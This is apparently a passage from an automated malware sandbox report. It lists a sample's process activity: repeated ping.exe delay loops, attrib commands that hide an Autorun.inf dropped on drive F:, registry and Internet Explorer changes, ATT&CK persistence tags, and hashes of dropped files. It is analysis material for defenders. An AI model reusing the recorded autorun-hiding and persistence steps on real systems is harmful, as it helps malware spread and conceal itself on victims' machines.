C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2676
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2804
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2640
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2160
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2596
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3068
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1624
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1964
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2956
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2480
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2304
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3056
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2236
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1688
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:856
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2572
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:524
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1672
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:728
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:576
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1516
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:2724
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230B
MD5e06b867ff16fea639a2ce7eb75999d39
SHA19d0a4ee56a165c12aaee5c50c481fbaa7c786c4c
SHA2566e1629744fab36a3edf8d15f0fcbdc84e29a924044a94ee094567bd12978ab71
SHA512098d5d2b0339fdab20eca77cd6ffa42db743c1ff6a33912e00ae397631dee8813bf048c4f7cc22c36d99c81b5a4de412a6bc8ffca55f3e7bb98f8f2fa6d77d46
-
Filesize
37B
MD51da609b2e39401d1d4d6eb0f9cc47ca7
SHA1e0d10e17576f85965871bb4f393ee1f2a263aa9c
SHA25675969e532d5047179347f8d4ea3b3659b39d225ba85dd19bfa962f72d8bd7a5b
SHA5128862f1c3db3b7512cf4c0b3512a1cda970e5381dae475be3cfe3dd3fe98d7d9488d53938ebb69afaf1f10f6f13417023f6b2da4790d57a016960db0975fb540c
-
Filesize
85B
MD5329d7061423f1c304a63860a91d758f4
SHA1bd21983b2d38ae4194e2ad2c39d2ad27fab0ceee
SHA256c64ceb473228ef34e64a9df142e34abd5893aa335bad74d274eafd88fff76147
SHA51249b904310e3a33c6a546f40f9f370d9e34156d46044c4080a83a8011b0d9d22483910025df2d9bb06fb88334aa8879203461c49275a5af0fb10c8a706e8d54b9
-
Filesize
133B
MD55488e0e30d55315e71980ea131ca4210
SHA1ec094f274d3a042103d844d59138f93721537e43
SHA256b250e33ad8f1fd397b2e4a2d2f5e99df8fcbf67ad764a5dbacc41ef8739924e3
SHA5127531ddc46dc210e0105e265b60e0416e6e31e8d4ae501f2e367e030b0c135bd541d03035bdff6f2126935a0ff85e35c5acec12d072e42df95c75246be517e578
-
Filesize
144B
MD59aa3fa5c9e06a58b9e0f99ad893655c1
SHA1efce5888047631097097bce1c66be4a70f855525
SHA256e7a1aa0bbec1fcb9eaf17ac3d3748b0076b59c897577ca39e113e9f96ef598d2
SHA5123c9a6a2f5aab544ee14cf1d5ad886694ca544451010050c2479bbb05e315d8213bdf23ee042da7912f90968103e46e585cc814e87fb377a1a3440a544f5cb940
-
Filesize
162B
MD582ada0aa3ddf28d0358ef54af2f1a956
SHA14ed4c84a0209e7c534643bd786d99050216293f5
SHA256f34a4f018ed9bb24615344e7a9cf97f346f1a8542078c12627a17ef2697ba20c
SHA512dcd222d701556da50b87ef05685b5ce760a33cf84d315cbf2ac248c061cf3ea2231ff9c0f8490e71e75a5f736633e4c101c689a23bd566880788a8ac975b6928
-
Filesize
198B
MD549907b4e5be0f91edeeb0213555a36af
SHA16ac46bd31716d71a1011ffe1c643ec5cdef311cb
SHA256284992fe776aa822cf683297c0ae20d53b41ae8f53c0c4cc6bde61adc3014dcf
SHA5123e64d534b03bf111438c1e21cf18279a9646c092cf6d3eefe7cb414394f0db89885b50925f06b73c2f610c9e492ff2c5e0269acb2abca100e6be75c5f1f51491
-
Filesize
19KB
MD592aea9a4258be305cae995c63f7a5639
SHA1f7e317b324c08d710d6e3489ba2ffbb363590013
SHA2562ef1878edbb5869baed1febbc4ed624331c98c6b8dbdebacf06421f649856e97
SHA512b101636bf4f9db0868284ab5f428f7151e0ca5f2d3739985ecee8776abcd44f13bab5bf56bda934175072b455c1a782bc23f76771d7ae26803443c504e242bc1
-
Filesize
246B
MD50c59f302e0ab5ce6569cc7737cef489a
SHA11cc01e622bf6413ee256eb3d35d46070017fb189
SHA2568d18498e5c215bd6443d0f798d75906debd5d8b7bb296bc493b0169a149aa720
SHA5126d9845423ad6ce61646bae1b6bebc5f29990c9def9ea6f9f31bfa66cbf26b2d074b2c23216a641ce21d3e00588cb497353dc86d9a0c1f521f6e0bce5bd67746f
-
Filesize
3B
MD5bc949ea893a9384070c31f083ccefd26
SHA1cbb8391cb65c20e2c05a2f29211e55c49939c3db
SHA2566bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61
SHA512e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287